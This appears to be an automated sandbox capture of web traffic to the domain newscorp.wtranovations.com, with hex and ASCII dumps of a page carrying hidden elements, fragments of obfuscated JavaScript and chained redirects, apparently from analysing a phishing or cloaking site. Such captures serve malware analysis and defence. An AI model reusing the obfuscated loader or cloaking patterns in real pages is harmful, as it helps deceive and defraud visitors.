                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 31 64 34 31 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 33 37 36 32 63 65 20 66 66 39 34 63 20 64 30 31 33 36 20 61 65 36 64 65 66 63 20 61 32 37 30 30 61 20 68 69 64 64 65 6e 20 63 37 65 36 65 66 22 20 64 61 74 61 2d 61 36 64 64 33 3d 64 65 32 36 32 31 20 64 61 74 61 2d 62 31 39 65 38 3d 64 61 66 66 34 20 64 61 74 61 2d 62 35 32 62 3d 63 38 39 31 36 64 20 64 61 74 61 2d 63 31 61 38 62 3d 62 66 32 66 32 64 32 20 68 69 67 68 3d 63 38 35 31 30 37 61 32 38 64 35 62 39 20 69 64 3d 66 61 69 6c 75 72 65 20 69 6e 74 65 67 72 69 74 79 6b 69 6e 64 3d 64 30 30 36 63 31 37 30 64 31 20 6c 6f 77 3d 62 33 33 66 37 37 36 66 31 39 31 63 20 6d 65 74 68 6f 64 3d 63 64 31 32 63 33 35 65 34 65 20 6d 75 74 65 64 3d 63 34 64 34 31 62 39 31 38 65 3e 3c 73 70 61 6e 20 63 6c 61
                                                                                                                                                                                                                      Data Ascii: 1d41<div class="f3762ce ff94c d0136 ae6defc a2700a hidden c7e6ef" data-a6dd3=de2621 data-b19e8=daff4 data-b52b=c8916d data-c1a8b=bf2f2d2 high=c85107a28d5b9 id=failure integritykind=d006c170d1 low=b33f776f191c method=cd12c35e4e muted=c4d41b918e><span cla
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 39 20 64 61 74 61 2d 65 63 39 62 3d 65 37 64 30 30 20 64 61 74 61 2d 66 30 35 35 35 3d 62 66 66 36 66 62 20 64 61 74 61 2d 66 34 39 35 63 35 64 3d 64 33 63 66 20 64 61 74 61 2d 66 65 33 66 34 31 3d 66 38 37 20 6f 70 65 6e 3d 61 37 34 39 38 34 34 36 38 32 64 20 6f 70 74 69 6d 75 6d 3d 66 30 64 37 36 63 31 35 32 34 37 35 20 70 69 6e 67 3d 61 62 64 63 30 31 37 38 38 62 20 73 61 6e 64 62 6f 78 3d 63 63 64 65 64 31 61 66 38 64 38 36 36 65 32 20 73 63 6f 70 65 3d 63 32 33 35 35 32 34 34 31 61 36 64 38 38 30 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 34 2e 69 63 6f 6e 66 69 6e 64 65 72 2e 63 6f 6d 2f 64 61 74 61 2f 69 63 6f 6e 73 2f 69 6f 6e 69 63 6f 6e 73 2f 35 31 32 2f 69 63 6f 6e 2d 63 6c 6f 73 65 2d 72 6f 75 6e 64 2d 35 31 32 2e 70 6e 67
                                                                                                                                                                                                                      Data Ascii: 9 data-ec9b=e7d00 data-f0555=bff6fb data-f495c5d=d3cf data-fe3f41=f87 open=a749844682d optimum=f0d76c152475 ping=abdc01788b sandbox=ccded1af8d866e2 scope=c23552441a6d880><img src=https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-close-round-512.png
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 61 62 73 6f 6c 75 74 65 3b 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 39 32 3b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 6d 77 2d 70 61 67 65 2d 74 69 74 6c 65 2d 6d 61 69 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 77 69 64 74 68 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 30 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 2d 38 37 3b 22 3e 41 6e 6e 61 20 4a c3 b3 65 6c 73 64 c3 b3 74 74 69 72 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 32 65 32 64 20 74 69 6d 65 20 61 64 66 62 37 20 66 61 39 36 61 20 64 32 35 33 63 36 66 37 22 20 64 61 74 61 2d 62 35 33 38 33 62 3d 64 37
                                                                                                                                                                                                                      Data Ascii: absolute; opacity: 0; z-index: -92;"><span class=mw-page-title-main style="position: absolute; display: block; width: 0; height: 0; overflow: hidden; z-index: -87;">Anna Jelsdttir</span></h1><span class="c2e2d time adfb7 fa96a d253c6f7" data-b5383b=d7
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 65 32 65 61 2c 5f 30 78 32 38 38 38 32 32 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 66 63 30 31 66 28 5f 30 78 33 64 38 64 37 66 2c 5f 30 78 31 39 64 63 30 34 2c 5f 30 78 31 62 33 61 62 34 2c 5f 30 78 33 35 33 62 32 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 31 39 28 5f 30 78 31 62 33 61 62 34 2d 30 78 31 61 62 2c 5f 30 78 33 35 33 62 32 65 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 32 31 38 34 34 37 3d 5f 30 78 35 65 65 32 65 61 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 33 37 38 65 28 5f 30 78 31 35 34 34 38 36 2c 5f 30 78 34 37 34 38 36 33 2c 5f 30 78 34 31 62 31 36 65 2c 5f 30 78 35 65 63 39 65 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 31 39 28 5f 30 78 34 37 34 38 36 33 2d 30 78 31 34 33 2c 5f 30 78 34 31 62 31 36 65 29 3b 7d 77 68 69 6c 65
                                                                                                                                                                                                                      Data Ascii: e2ea,_0x288822){function _0x4fc01f(_0x3d8d7f,_0x19dc04,_0x1b3ab4,_0x353b2e){return _0x1319(_0x1b3ab4-0x1ab,_0x353b2e);}const _0x218447=_0x5ee2ea();function _0x42378e(_0x154486,_0x474863,_0x41b16e,_0x5ec9e0){return _0x1319(_0x474863-0x143,_0x41b16e);}while
                                                                                                                                                                                                                      2025-03-21 14:29:04 UTC1369INData Raw: 6e 73 74 20 5f 30 78 31 38 61 35 39 63 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 62 65 64 31 64 3d 7b 27 4b 70 70 4c 72 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 36 65 35 35 62 2c 5f 30 78 31 38 66 62 38 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 36 65 35 35 62 3d 3d 3d 5f 30 78 31 38 66 62 38 36 3b 7d 2c 27 61 48 61 53 68 27 3a 27 56 4f 68 6c 47 27 2c 27 70 61 6e 79 55 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 63 36 65 62 62 2c 5f 30 78 34 62 37 34 62 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 63 36 65 62 62 21 3d 3d 5f 30 78 34 62 37 34 62 39 3b 7d 2c 27 64 63 53 6e 6d 27 3a 5f 30 78 32 61 62 37 63 62 28 2d 30 78 32 31 2c 30 78 38 2c 2d 30 78 34 64 2c 2d 30 78 32 36 29 2c 27 50 44 62 43 76 27 3a 5f 30 78 32 61 62 37 63 62
                                                                                                                                                                                                                      Data Ascii: nst _0x18a59c=(function(){const _0x3bed1d={'KppLr':function(_0x26e55b,_0x18fb86){return _0x26e55b===_0x18fb86;},'aHaSh':'VOhlG','panyU':function(_0x5c6ebb,_0x4b74b9){return _0x5c6ebb!==_0x4b74b9;},'dcSnm':_0x2ab7cb(-0x21,0x8,-0x4d,-0x26),'PDbCv':_0x2ab7cb


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      7192.168.11.1249384104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1170INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:05 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpjFV%2FLeaQ1K0m7Qv07R0g6HUryXUSGgO7Z2Lwcsqu1cCZc7sTA5rQuPGBDzLwIL4x1%2Bnvoi3KAggY1eRm4KALkMH%2BNjgw1CPQ2qsj5cK4dvhRp0hUM6bQkcDHjOVO4JaEassKiDVP2mZrr0aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=565&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b5ec33bd4e-ATL
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=114152&min_rtt=114097&rtt_var=24154&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=35331&cwnd=240&unsent_bytes=0&cid=abdc24061a8956f9&ts=340&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      8192.168.11.1249385104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1194INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:05 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RzwEnSwH4%2FqyPOUx2lxPvDDqUNoZxs2f4P93W7f3mkBlHGSjZ1fKSXv8FMY%2BEXkQTTLHzru6nCQ7UgwPoR8siqqC%2F10nzSK4Go8x0koN%2FE095N9VVzfvQPub9Ps%2BBD7DuCvW%2BBJSMoFir7j%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=98&min_rtt=98&rtt_var=49&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23b5ecebbfc2-ATL
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=114126&min_rtt=114047&rtt_var=24179&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=35327&cwnd=252&unsent_bytes=0&cid=f51f91634e7cd0a6&ts=330&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      9192.168.11.1249386151.101.1.229443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC362OUTGET /npm/ua-parser-js@1.0.38/src/ua-parser.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: cdn.jsdelivr.net
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 17555
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Expose-Headers: *
                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                      X-JSD-Version: 1.0.38
                                                                                                                                                                                                                      X-JSD-Version-Type: version
                                                                                                                                                                                                                      ETag: W/"4493-Rk+b4s/pYdA59q3CAWuLvyfej3M"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Age: 51294
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:05 GMT
                                                                                                                                                                                                                      X-Served-By: cache-fra-eddf8230133-FRA, cache-pdk-kfty8610055-PDK
                                                                                                                                                                                                                      X-Cache: HIT, MISS
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 33 37 2e 30 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 75 61 2d 70 61 72 73 65 72 2d 6a 73 40 31 2e 30 2e 33 38 2f 73 72 63 2f 75 61 2d 70 61 72 73 65 72 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 65 29
                                                                                                                                                                                                                      Data Ascii: /** * Minified by jsDelivr using Terser v5.37.0. * Original file: /npm/ua-parser-js@1.0.38/src/ua-parser.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(i,e)
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 29 3a 65 3a 34 3d 3d 3d 62 2e 6c 65 6e 67 74 68 26 26 28 74 68 69 73 5b 62 5b 30 5d 5d 3d 64 3f 62 5b 33 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 64 2e 72 65 70 6c 61 63 65 28 62 5b 31 5d 2c 62 5b 32 5d 29 29 3a 65 29 3a 74 68 69 73 5b 62 5d 3d 64 7c 7c 65 3b 6c 2b 3d 32 7d 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6f 29 7b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 6f 29 69 66 28 74 79 70 65 6f 66 20 6f 5b 61 5d 3d 3d 3d 72 26 26 6f 5b 61 5d 2e 6c 65 6e 67 74 68 3e 30 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 6f 5b 61 5d 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 69 66 28 49 28 6f 5b 61 5d 5b 74 5d 2c 69 29 29 72 65 74 75 72 6e 22 3f 22 3d 3d 3d 61 3f 65 3a 61 7d 65 6c 73 65 20 69 66 28 49 28 6f 5b 61 5d 2c 69 29 29 72 65 74 75 72 6e 22 3f 22 3d 3d 3d 61 3f 65
                                                                                                                                                                                                                      Data Ascii: ):e:4===b.length&&(this[b[0]]=d?b[3].call(this,d.replace(b[1],b[2])):e):this[b]=d||e;l+=2}},H=function(i,o){for(var a in o)if(typeof o[a]===r&&o[a].length>0){for(var t=0;t<o[a].length;t++)if(I(o[a][t],i))return"?"===a?e:a}else if(I(o[a],i))return"?"===a?e
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 5b 62 2c 22 55 43 22 2b 5f 5d 5d 2c 5b 2f 6d 69 63 72 6f 6d 2e 2b 5c 62 71 62 63 6f 72 65 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 5c 62 71 62 63 6f 72 65 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2e 2b 6d 69 63 72 6f 6d 2f 69 2c 2f 6d 69 63 72 6f 6d 65 73 73 65 6e 67 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 5b 62 2c 22 57 65 43 68 61 74 22 5d 5d 2c 5b 2f 6b 6f 6e 71 75 65 72 6f 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 5b 62 2c 22 4b 6f 6e 71 75 65 72 6f 72 22 5d 5d 2c 5b 2f 74 72 69 64 65 6e 74 2e 2b 72 76 5b 3a 20 5d 28 5b 5c 77 5c 2e 5d 7b 31 2c 39 7d 29 5c 62 2e 2b 6c 69 6b 65 20 67 65 63 6b 6f 2f 69 5d 2c 5b 6c 2c 5b 62 2c 22 49 45 22 5d 5d 2c 5b 2f 79 61 28 3f 3a 73 65 61 72
                                                                                                                                                                                                                      Data Ascii: [\w\.]+)/i],[l,[b,"UC"+_]],[/microm.+\bqbcore\/([\w\.]+)/i,/\bqbcore\/([\w\.]+).+microm/i,/micromessenger\/([\w\.]+)/i],[l,[b,"WeChat"]],[/konqueror\/([\w\.]+)/i],[l,[b,"Konqueror"]],[/trident.+rv[: ]([\w\.]{1,9})\b.+like gecko/i],[l,[b,"IE"]],[/ya(?:sear
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 61 66 61 72 69 20 28 6c 69 6e 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 5c 62 28 6c 69 6e 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 5c 2f 69 61 62 2f 69 2c 2f 28 61 6c 69 70 61 79 29 63 6c 69 65 6e 74 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 74 77 69 74 74 65 72 29 28 3f 3a 61 6e 64 7c 20 66 2e 2b 65 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 28 63 68 72 6f 6d 69 75 6d 7c 69 6e 73 74 61 67 72 61 6d 7c 73 6e 61 70 63 68 61 74 29 5b 5c 2f 20 5d 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 62 2c 6c 5d 2c 5b 2f 5c 62 67 73 61 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 2e 2a 73 61 66 61 72 69 5c 2f 2f 69 5d 2c 5b 6c 2c 5b 62 2c 22 47 53 41 22 5d 5d 2c 5b 2f 6d 75 73 69 63 61 6c 5f 6c 79 28 3f 3a 2e 2b 61 70 70 5f 3f 76 65 72 73 69 6f 6e 5c 2f 7c 5f
                                                                                                                                                                                                                      Data Ascii: afari (line)\/([\w\.]+)/i,/\b(line)\/([\w\.]+)\/iab/i,/(alipay)client\/([\w\.]+)/i,/(twitter)(?:and| f.+e\/([\w\.]+))/i,/(chromium|instagram|snapchat)[\/ ]([-\w\.]+)/i],[b,l],[/\bgsa\/([\w\.]+) .*safari\//i],[l,[b,"GSA"]],[/musical_ly(?:.+app_?version\/|_
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 6f 7c 69 63 65 7c 75 70 29 5b 5c 2e 20 5d 3f 62 72 6f 77 73 65 72 29 5b 2d 5c 2f 20 5d 3f 76 3f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 69 6e 6b 73 29 20 5c 28 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 70 61 6e 61 73 6f 6e 69 63 3b 28 76 69 65 72 61 29 2f 69 5d 2c 5b 62 2c 6c 5d 2c 5b 2f 28 63 6f 62 61 6c 74 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 62 2c 5b 6c 2c 2f 6d 61 73 74 65 72 2e 7c 6c 74 73 2e 2f 2c 22 22 5d 5d 5d 2c 63 70 75 3a 5b 5b 2f 28 3f 3a 28 61 6d 64 7c 78 28 3f 3a 28 3f 3a 38 36 7c 36 34 29 5b 2d 5f 5d 29 3f 7c 77 6f 77 7c 77 69 6e 29 36 34 29 5b 3b 5c 29 5d 2f 69 5d 2c 5b 5b 63 2c 22 61 6d 64 36 34 22 5d 5d 2c 5b 2f 28 69 61 33 32 28 3f 3d 3b 29 29 2f 69 5d 2c 5b 5b 63 2c 47 5d 5d 2c 5b 2f 28 28 3f 3a 69 5b 33 34 36 5d 7c 78
                                                                                                                                                                                                                      Data Ascii: o|ice|up)[\. ]?browser)[-\/ ]?v?([\w\.]+)/i,/(links) \(([\w\.]+)/i,/panasonic;(viera)/i],[b,l],[/(cobalt)\/([\w\.]+)/i],[b,[l,/master.|lts./,""]]],cpu:[[/(?:(amd|x(?:(?:86|64)[-_])?|wow|win)64)[;\)]/i],[[c,"amd64"]],[/(ia32(?=;))/i],[[c,G]],[/((?:i[346]|x
                                                                                                                                                                                                                      2025-03-21 14:29:05 UTC1378INData Raw: 2f 69 2c 2f 5c 62 3b 20 28 5c 77 2b 29 20 62 75 69 6c 64 5c 2f 68 6d 5c 31 2f 69 2c 2f 5c 62 28 68 6d 5b 2d 5f 20 5d 3f 6e 6f 74 65 3f 5b 5f 20 5d 3f 28 3f 3a 5c 64 5c 77 29 3f 29 20 62 75 69 2f 69 2c 2f 5c 62 28 72 65 64 6d 69 5b 5c 2d 5f 20 5d 3f 28 3f 3a 6e 6f 74 65 7c 6b 29 3f 5b 5c 77 5f 20 5d 2b 29 28 3f 3a 20 62 75 69 7c 5c 29 29 2f 69 2c 2f 6f 69 64 5b 5e 5c 29 5d 2b 3b 20 28 6d 3f 5b 31 32 5d 5b 30 2d 33 38 39 5d 5b 30 31 5d 5c 77 7b 33 2c 36 7d 5b 63 2d 79 5d 29 28 20 62 75 69 7c 3b 20 77 76 7c 5c 29 29 2f 69 2c 2f 5c 62 28 6d 69 5b 2d 5f 20 5d 3f 28 3f 3a 61 5c 64 7c 6f 6e 65 7c 6f 6e 65 5b 5f 20 5d 70 6c 75 73 7c 6e 6f 74 65 20 6c 74 65 7c 6d 61 78 7c 63 63 29 3f 5b 5f 20 5d 3f 28 3f 3a 5c 64 3f 5c 77 3f 29 5b 5f 20 5d 3f 28 3f 3a 70 6c 75 73
                                                                                                                                                                                                                      Data Ascii: /i,/\b; (\w+) build\/hm\1/i,/\b(hm[-_ ]?note?[_ ]?(?:\d\w)?) bui/i,/\b(redmi[\-_ ]?(?:note|k)?[\w_ ]+)(?: bui|\))/i,/oid[^\)]+; (m?[12][0-389][01]\w{3,6}[c-y])( bui|; wv|\))/i,/\b(mi[-_ ]?(?:a\d|one|one[_ ]plus|note lte|max|cc)?[_ ]?(?:\d?\w?)[_ ]?(?:plus
